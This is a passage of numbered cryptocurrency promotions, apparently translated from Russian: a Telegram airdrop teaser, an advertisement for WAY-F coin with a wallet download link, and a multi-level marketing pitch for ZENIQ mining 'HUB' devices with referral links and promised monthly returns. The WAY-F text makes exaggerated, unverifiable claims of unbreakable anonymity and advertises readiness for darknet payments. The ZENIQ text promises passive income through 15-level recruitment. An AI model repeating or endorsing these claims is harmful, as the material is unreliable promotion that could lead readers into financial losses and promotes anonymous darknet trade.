  23. Get coins for completing tasks in Telegram! Link - CLICK. The airdrop ends on March 30. Tokens will arrive in wallets on March 31. Approximate listing price on PanCakeSwap: 1SULY = 1,3$.
  24. The WAY-F coin team has many years of experience in developing and delivering projects, as well as various solutions in the field of cryptocurrencies and blockchain technologies. The coin was based on the Bitcoin blockchain, which was improved, by modest estimates, 10 times over, building on the acute problems the crypto industry faces today. WAY-F coin is open source (https://github.com/wayfcoin/source), so anyone can take it and make their own cryptocurrency based on the WAY-F blockchain. Thanks to advanced solutions and developments in the blockchain field and their successful application in WAY-F coin, the coin is a benchmark of technical implementation for many cryptocurrencies and also surpasses Dash and Monero several times over.

Exchanges where WAYF coin is traded

Today you can buy or sell the WAYF coin on four major exchanges:
Coinsbit: the largest European exchange, launched in Estonia in 2018. The exchange regularly holds leading positions in the TOP-50 with a trading volume of $2 256 133 060 per 24 hours.
BigONE: the largest Chinese exchange among those that appeared on the wave of cryptocurrency success in 2017. Its daily trading volume ($394 337 459) already exceeds that of the well-known Poloniex ($221 650 532), which today ranks 11th among all exchanges.
Biconoby: a young and very promising exchange that opens access to the Canadian market for the community. The exchange's daily trading volume is $757 543 954.
PrizmBit: a CIS exchange launched not long ago, in 2019. Today the platform is in the TOP-150 exchanges according to CoinMarketCap.

In 2020 WAYF coin was added to the authoritative cryptocurrency tracker CoinMarketCap. This year (2021) the ability to create smart contracts on the WAYF blockchain will be implemented.

Absolute protection of data and privacy

One of the coin's main advantages is complete anonymity through absolute protection of data and privacy, which is provided by a multitude of innovative technological solutions.

GCPT technology provides an entirely new level of anonymity. Any information inside the system remains completely hidden from prying eyes, with no possibility of bypassing it by any method existing in the world.

ES Technology provides impregnable protection for the entire blockchain network. It does not allow the network to be destabilized even when the highest capacities are used on the Proof-of-Work algorithm. This technology guarantees that all network participants are on an equal footing and unquestioningly follow the rules common to the whole community.

AlphaDeepSend is a unique service for sending messages of up to 1.000.000 characters with multi-stage crypto encryption of data. The level of encryption of sender and recipient data is dozens of times superior to all existing resources: Telegram, Tor, VPN services, etc. Accordingly, it is simply impossible for third parties to learn the encryption keys or any data.

Stable transaction speed

The coin's team took care of the blockchain network's throughput right from the start, applying today's most advanced solutions.

The adaptive block size changes depending on the number of transactions being processed simultaneously, which guarantees their stable and fast confirmation.

The VRX algorithm checks the last 6 blocks in the chain after each newly formed block and adjusts the network difficulty to ensure a constant block creation time.

Integrating the coin into any marketplace or platform

Importantly, in technical terms the coin is fully ready for use on the DarkNet. In addition, the Internet also has plenty of marketplaces and platforms where anonymity of data and payments is in demand, both between consumer and seller and with respect to third parties.

TRUECONNECT technology provides organic integration of the coin as a means of fully anonymous payments and transfers. This technology allows WAY-F coin to be integrated into absolutely any marketplace and helps it reach the international consumer market.

Today there are already successful examples of paying for goods and services with WAY-F coins. Everything is ready to use; simply submit an integration request via tech support on the WAYFcoin.com website.

How can you start earning with WAY-F coin today?

Two mining algorithms

A unique feature of the coin is that mining via the software wallet (https://github.com/wayfcoin/source/releases/download/2/Wayfcoin-qt.exe) runs in parallel on two algorithms, Proof-of-Work and Proof-of-Stake. Network participants can always choose the mining algorithm that is most convenient and profitable for them.

PoW mining uses the most advanced of today's algorithms, X11, which differs radically from the SHA-256 algorithm used in Bitcoin. The x11 algorithm is resistant to ASIC mining, which is the primary cause of blockchain network centralization and 51% attacks today.

Proof-of-Credit is a unique algorithm for the WAYFcoin.com mining pool that complements Proof-of-Stake. This algorithm is intended for the equal distribution of block mining rewards among all members of the community.

WAY-F Coin technical specifications
Mining algorithm: X11
TxComment message size: Max 1024 bytes
Block time: 5-10 minutes
Block size: 2 Mb
P2P port: 49055
Ticker: WAYF
Programming language: C++
Total supply: 120 000 000 WAYF
Premine: 6 000 000 WAYF
PoW reward: 4 WAYF
Diff retarget: VRX Every Block
Masternode price: 5000 WAYF

The total number of coins is strictly limited. After 120 000 000 WAYF have been created, mining will be stopped completely.

=============================
Official website of the coin: https://wayfcoin.com/
Whitepaper of the coin: https://wayfcoin.com/whitePaper
  25. Safir Global International in Russia

PRODUCTS

INTRODUCTION
The IT industry is thriving and is of the greatest importance for creating the digital world. This refers to the set of enterprise hardware that helps create, test, operate and maintain information technology services. In today's digital age, customers have expectations of IT, since it is the foundation that helps companies become agile, service-oriented and able to deliver unexpected and satisfying experiences to their customers. Safir Global DMCC is a well-known IT hardware company in the UAE that offers IT hardware-related services to help businesses meet their requirements in the digital world. We are all set to combine our extensive, rich industry experience and knowledge to help our clients get the most out of their IT investments.

VALUE

BEST SERVICE
In a world that is constantly changing, we are strong and reliable partners for both small businesses and large organizations. Our dedicated team is focused on providing the best service and support to all our clients.

UP TO DATE
We keep our finger on the pulse of technology to provide you with only the latest hardware and software that make your work easier and help you handle the most difficult situations.

BETTER FUTURE
At Safir Global DMCC we sincerely believe that technology is at its best when it brings people together, so come and join us, and let's build a better future together!

INTERNATIONAL COMPANY SAFIR GLOBAL & ZENIQ TECHNOLOGIES

COMPANY MARKETING
✅ Unilevel (up to 15 levels)
✅ Career bonus
✅ Bonus fund
⛔️ NOT an investment project with very cool career bonuses.
A product business using the latest Blockchain technologies
CrossFI & Blockchain International Company
It is all very interesting and not simple.
At the helm are not actors but more than reputable people.
The official start of the project will be at the end of October in Dubai.
The sooner you take a HUB, the more ZENIQ coins it will subsequently bring.
Not a recommendation, everyone has their own head.

COMPANY MISSION
Uniting traditional banking and cryptocurrencies on one platform where people can build their own business and secure a stable income using the ZENIQ platform.
More about the company on the website: https://safir-global.ru/ and https://zeniq-coin.ru/

❗️ Press / Media
▪️https://bit.ly/cryptovoizezeniq
▪️https://bit.ly/thetokenizerzeniq
▪️https://bit.ly/arabianbusinesszeniq
▪️https://bit.ly/wozingazeniq
▪️https://bit.ly/mideastzeniq

‼️ ATTENTION, VERY IMPORTANT ‼️
✅ When registering, you do not have to make a deposit to start earning. Line 1 works right away.
REGISTRATION IN THE TEAM
https://safir.com/ref/fg5vbqrs2m
Any questions left? Write: https://t.me/Alexsandr81
Our group: https://t.me/SafirGlobal_Official
ZENIQ token rate on UniSwap: https://info.uniswap.org/#/tokens/0x5b52bfb8062ce664d74bbcd4cd6dc7df53fd7233

✅ RETURN on fully passive income falls by 4% with every 1000 devices sold, but the rate should rise with the introduction of new products and exchange listings.
Return calculation:
▪️One unit (HUB, price 1500€): 690 coins per month. 23 coins per day.
The calculations are approximate and this value is not constant.

✅ SUMMARY
If you want to earn passively or as a network marketing leader, you need to be here!
Safir International, official sales partner of ZENIQ.
ZENIQ Hub - YOUR own digital asset kept safe with your own machine for minting digital coins.
ZENIQ Hub is outstanding hardware with a security and participation system that has had no equal before!
This money machine works day and night!
We invite you to look at our offer as an investor or as a networker, benefiting from a magnificent marketing plan with commissioning on 15 levels. If you want to earn passively or as a network marketing leader, you need to be here!

The ZENIQ coin will bring insane benefits
Exchange listing of ZENIQ Coins in the first quarter of 2021
Capital accumulation for everyone
» ZENIQ Coins
» Decentralized exchange (with minimal fees)
» Trillion market thanks to tokenization
» And much more
» Limited number of coins

Huge potential for growth in coin value thanks to the following:
- Limited quantity on HUB 01 with full minting capacity
- "Halving" every year
- Weekly "profit payout" of the ZENIQ exchange for passive income
- Tokenization of ZENIQ projects and other projects

The ZENIQ coin will bring insane benefits
Don't miss your chance!
Turnover
Finally your own BANK

⛳️ REGISTRATION
https://safir-global.ru/ and https://zeniq-coin.ru/
Or via the ref. link https://safir.com/ref/fg5vbqrs2m